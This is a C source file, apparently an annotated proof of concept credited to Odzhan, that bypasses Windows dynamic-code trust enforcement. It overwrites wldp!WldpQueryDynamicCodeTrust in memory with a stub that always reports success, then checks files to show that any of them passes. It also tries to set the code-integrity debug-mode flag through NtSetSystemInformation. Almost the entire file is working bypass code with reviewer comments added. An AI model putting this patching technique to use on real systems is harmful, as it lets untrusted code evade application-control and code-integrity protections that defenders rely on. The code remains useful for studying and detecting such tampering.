- /**
- BSD 3-Clause License
- Copyright (c) 2019 Odzhan. All rights reserved.
- Redistribution and use in source and binary forms, with or without
- modification, are permitted provided that the following conditions are met:
- * Redistributions of source code must retain the above copyright notice, this
- list of conditions and the following disclaimer.
- * Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation
- and/or other materials provided with the distribution.
- * Neither the name of the copyright holder nor the names of its
- contributors may be used to endorse or promote products derived from
- this software without specific prior written permission.
- THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
- AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
- DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
- FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
- CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
- OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
- OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
- */
- #include <windows.h>
- #include <wldp.h>
- #include <stdio.h>
// Function-pointer types for the two wldp.dll exports this program resolves at
// run time with GetProcAddress instead of linking against an import library.
// NOTE(review): the prototypes are transcribed by the author; confirm them
// against the wldp.h shipped with the SDK in use before relying on the
// parameter lists.
typedef HRESULT (WINAPI *WldpIsDynamicCodePolicyEnabled_t)(
    PBOOL isEnabled);
typedef HRESULT (WINAPI *WldpQueryDynamicCodeTrust_t)(
    HANDLE fileHandle,
    PVOID baseImage,
    ULONG ImageSize);
// Replacement body that PatchWldp() copies over the real
// WldpQueryDynamicCodeTrust in this process: it ignores every argument and
// reports success unconditionally, so the trust check is defeated for any
// caller of the export in the patched process.  The parameters are unused by
// design.  PatchWldp() derives the byte length of this function from the
// address of the marker function that follows it, so the body must stay
// minimal; adding code here changes the number of bytes copied.
static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
    HANDLE fileHandle,
    PVOID baseImage,
    ULONG ImageSize)
{
    return S_OK;
}
// Address marker only, never called: PatchWldp() uses
// (StubEnd - Stub) as the stub's byte length.  NOTE(review): this relies on
// the compiler emitting the two functions contiguously and in source order,
// which no C standard guarantees (function reordering, LTO or identical-code
// folding can all break the assumption).
static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}
// Overwrite the in-memory entry of wldp!WldpQueryDynamicCodeTrust with the
// always-S_OK stub above, so that the trust check is bypassed in this process.
//
// Returns TRUE when the bytes were copied, FALSE when wldp.dll could not be
// loaded, the export could not be resolved, or the page could not be made
// writable.
//
// Review notes: the change is presumably process-local (a private copy of the
// image page); the transient PAGE_EXECUTE_READWRITE protection on an
// image-backed region and the divergence between the patched bytes and
// wldp.dll on disk are what a monitoring tool would observe.  The module
// handle from LoadLibrary is never released, which is intentional in that the
// patch must outlive this function.  `len` is a ULONG_PTR difference stored in
// a DWORD; the stub is a handful of bytes, so the narrowing is harmless here.
static BOOL PatchWldp(VOID) {
    BOOL patched = FALSE;
    HMODULE wldp;
    DWORD len, op, t;
    LPVOID cs;

    // load wldp
    wldp = LoadLibrary("wldp");
    if(wldp != NULL) {
        // resolve address of function to patch
        cs = GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
        if(cs != NULL) {
            // calculate length of stub (difference of two function addresses;
            // assumes contiguous layout, see WldpQueryDynamicCodeTrustStubEnd)
            len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
                  (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
            // make the memory writeable
            if(VirtualProtect(
                cs, len, PAGE_EXECUTE_READWRITE, &op))
            {
                // over write with stub
                memcpy(cs, &WldpQueryDynamicCodeTrustStub, len);
                patched = TRUE;
                // set back to original protection (return value is not checked;
                // the copy has already happened and `patched` is already TRUE)
                VirtualProtect(cs, len, op, &t);
            }
        }
    }
    return patched;
}
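// Ask wldp!WldpQueryDynamicCodeTrust whether the file at `path` is trusted
// under the current dynamic-code policy, by mapping the file read-only and
// handing the view to the export.
//
// path: NUL-terminated ANSI path of the file to check (opened read-only,
//       shared for reading).
// Returns TRUE only when the export was resolved, the file was mapped and the
// query returned S_OK; FALSE for any failure (unresolvable export, unopenable
// file, empty or >= 4 GiB file, mapping failure, or a non-S_OK result).
//
// Once PatchWldp() has run in this process the export called here is the
// always-S_OK stub, so the result no longer reflects the policy; that is what
// the program demonstrates, not a property of this function.
//
// Fixes relative to the original: a NULL module is no longer passed to
// GetProcAddress; GetFileSize()'s failure value and files whose size does not
// fit the export's ULONG parameter are rejected instead of being passed
// truncated; the module reference taken by LoadLibrary is released.
BOOL VerifyCodeTrust(const char *path) {
    WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust = NULL;
    HMODULE wldp;
    HANDLE file, map;
    LPVOID mem;
    HRESULT hr = -1;      // any non-S_OK value until the query says otherwise
    DWORD low, high;

    // load wldp and resolve the export; a NULL module is treated the same as
    // an unresolved export
    wldp = LoadLibrary("wldp");
    if(wldp != NULL) {
        _WldpQueryDynamicCodeTrust =
            (WldpQueryDynamicCodeTrust_t)
            GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    }
    // return FALSE on failure
    if(_WldpQueryDynamicCodeTrust == NULL) {
        printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
        if(wldp != NULL) {
            FreeLibrary(wldp);
        }
        return FALSE;
    }

    // open file for reading
    file = CreateFile(
        path, GENERIC_READ, FILE_SHARE_READ,
        NULL, OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) {
        goto out_lib;
    }

    // get size.  GetFileSize() signals failure with all bits set in the low
    // part (INVALID_FILE_SIZE); the export takes the size as a ULONG, so a
    // non-zero high part cannot be represented either.  Empty files cannot be
    // mapped at all.
    low = GetFileSize(file, &high);
    if(low == 0 || low == (DWORD)-1 || high != 0) {
        goto out_file;
    }

    // create read-only mapping of the whole file
    map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, 0);
    if(map == NULL) {
        goto out_file;
    }

    // get pointer to memory
    mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
    if(mem != NULL) {
        // verify signature; only the mapped image is handed over, no file handle
        hr = _WldpQueryDynamicCodeTrust(NULL, mem, low);
        UnmapViewOfFile(mem);
    }
    CloseHandle(map);
out_file:
    CloseHandle(file);
out_lib:
    FreeLibrary(wldp);
    return hr == S_OK;
}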
- #include "C:\ntlib\ntddk.h"
// Information class for NtQuery/NtSetSystemInformation and the flag bits of
// SYSTEM_CODEINTEGRITY_INFORMATION.CodeIntegrityOptions, defined locally
// (presumably because the included ntddk.h does not provide them).
// NOTE(review): the values are transcribed by the author; check them against
// the WDK header before depending on any individual bit.
#define SystemCodeIntegrityInformation 0x67
// system-wide code integrity state
#define CODEINTEGRITY_OPTION_ENABLED 0x0001
#define CODEINTEGRITY_OPTION_TESTSIGN 0x0002
// user-mode code integrity (UMCI) state
#define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x0004
#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x0008
#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x0010
// build flavour / debug state of the running system
#define CODEINTEGRITY_OPTION_TEST_BUILD 0x0020
#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x0040
#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x0080
#define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x0100
#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x0200
// hypervisor-enforced kernel-mode code integrity (HVCI / KMCI) state
#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x0400
#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x0800
#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000
// One row of the flag-name table used by ListCIOptions().
// NOTE(review): szOption is initialised from string literals and only ever
// read, so `const char *` would be the accurate type; left as PCHAR here.
typedef struct _ci_opt {
    ULONG ulOption;   // a single CODEINTEGRITY_OPTION_* bit
    PCHAR szOption;   // its printable name
} ci_opt;
// Flag -> name table walked by ListCIOptions(); the {0, NULL} row terminates
// it, so every real entry must have a non-zero ulOption.
ci_opt options[]={
    {CODEINTEGRITY_OPTION_ENABLED,"CODEINTEGRITY_OPTION_ENABLED"},
    {CODEINTEGRITY_OPTION_TESTSIGN,"CODEINTEGRITY_OPTION_TESTSIGN"},
    {CODEINTEGRITY_OPTION_UMCI_ENABLED,"CODEINTEGRITY_OPTION_UMCI_ENABLED"},
    {CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED"},
    {CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED,"CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED"},
    {CODEINTEGRITY_OPTION_TEST_BUILD,"CODEINTEGRITY_OPTION_TEST_BUILD"},
    {CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD,"CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD"},
    {CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED,"CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED"},
    {CODEINTEGRITY_OPTION_FLIGHT_BUILD,"CODEINTEGRITY_OPTION_FLIGHT_BUILD"},
    {CODEINTEGRITY_OPTION_FLIGHTING_ENABLED,"CODEINTEGRITY_OPTION_FLIGHTING_ENABLED"},
    {CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED"},
    {CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED"},
    {CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED"},
    {CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED,"CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED"},
    {0, NULL}   // terminator
};
// Buffer layout for the SystemCodeIntegrityInformation class.  Length must be
// set to sizeof(SYSTEM_CODEINTEGRITY_INFORMATION) by the caller before the
// query (see ListCIOptions() / EnableCIOption()).
typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
    ULONG Length;                 // size of this structure, filled in by the caller
    ULONG CodeIntegrityOptions;   // bitmask of CODEINTEGRITY_OPTION_* flags
} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
// Query SystemCodeIntegrityInformation and print, one per line under a
// "Code Integrity Options." header, the name of every flag that is set in
// CodeIntegrityOptions.  Prints nothing at all when the query fails.
VOID ListCIOptions(VOID) {
    SYSTEM_CODEINTEGRITY_INFORMATION info;
    DWORD returned;
    const ci_opt *entry;

    info.Length = sizeof(info);
    if(!NT_SUCCESS(NtQuerySystemInformation(
            SystemCodeIntegrityInformation,
            &info, sizeof(info), &returned))) {
        return;
    }

    printf("\nCode Integrity Options.\n\n");
    // walk the name table up to its {0, NULL} terminator
    for(entry = options; entry->ulOption != 0; entry++) {
        if((info.CodeIntegrityOptions & entry->ulOption) != 0) {
            printf("%s\n", entry->szOption);
        }
    }
}
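// Try to add `Option` to the system's CodeIntegrityOptions: read the current
// SYSTEM_CODEINTEGRITY_INFORMATION, OR the flag in, and write it back with
// NtSetSystemInformation.
//
// Option: one of the CODEINTEGRITY_OPTION_* bits defined above.
// Returns TRUE only if the set call reports success; FALSE when either the
// query or the set fails.  As the author notes, setting this information
// class is rejected with STATUS_INVALID_INFO_CLASS, so the expected outcome is
// FALSE; the status is printed so the reason is visible.
//
// Fix: the original OR-ed the hard-coded DEBUGMODE flag instead of `Option`,
// so the parameter had no effect (the only caller passes that same flag, so
// its behaviour is unchanged); the unused loop index is dropped.
BOOL EnableCIOption(ULONG Option) {
    NTSTATUS status;
    SYSTEM_CODEINTEGRITY_INFORMATION scii;
    DWORD len;

    scii.Length = sizeof(scii);
    status = NtQuerySystemInformation(
        SystemCodeIntegrityInformation,
        &scii, sizeof(scii), &len);
    if(NT_SUCCESS(status)) {
        scii.CodeIntegrityOptions |= Option;
        status = NtSetSystemInformation(
            SystemCodeIntegrityInformation,
            &scii, sizeof(scii), &len);
        printf("status is %08lx\n", status);
    }
    return NT_SUCCESS(status);
}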
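// Entry point.  Reports the current code-integrity state, patches
// wldp!WldpQueryDynamicCodeTrust in this process, then runs VerifyCodeTrust()
// over every non-directory path on the command line so the effect of the
// patch on the reported result can be observed.
//
// argv[1..]: paths to check; directories are skipped.  GetFileAttributes()
// returns INVALID_FILE_ATTRIBUTES (all bits set) for a path it cannot query,
// and that value also has the DIRECTORY bit set, so non-existent paths are
// skipped silently rather than reported as FAILED.
// Always returns 0.
//
// Fixes relative to the original: the policy query is resolved under its own
// export name (the original looked up "WldpQueryDynamicCodeTrust" and called
// it through the single-PBOOL prototype, a signature mismatch that left
// `enabled` uninitialised); a missing export now ends the run instead of
// falling through to a call on a NULL pointer.
int main(int argc, char *argv[]) {
    int i;
    WldpIsDynamicCodePolicyEnabled_t WldpIsDynamicCodePolicyEnabled;
    BOOL enabled = FALSE;   // stays FALSE unless the query sets it

    EnableCIOption(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED);
    ListCIOptions();

    WldpIsDynamicCodePolicyEnabled =
        (WldpIsDynamicCodePolicyEnabled_t)
        GetProcAddress(LoadLibrary("wldp"), "WldpIsDynamicCodePolicyEnabled");
    if(WldpIsDynamicCodePolicyEnabled == NULL) {
        printf("unable to load Wldp.\n");
        return 0;
    }
    WldpIsDynamicCodePolicyEnabled(&enabled);
    printf("Wldp Code Policy is %s.\n",
        enabled ? "enabled" : "disabled");

    if(!PatchWldp()) {
        printf("unable to patch Wldp.\n");
        return 0;
    }
    for(i=1; i<argc; i++) {
        // skip directories (and, as noted above, paths that cannot be queried)
        if(GetFileAttributes(argv[i]) & FILE_ATTRIBUTE_DIRECTORY) continue;
        // verify file
        printf("%-8s : %s\n",
            VerifyCodeTrust(argv[i]) ? "OK" : "FAILED",
            argv[i]);
    }
    return 0;
}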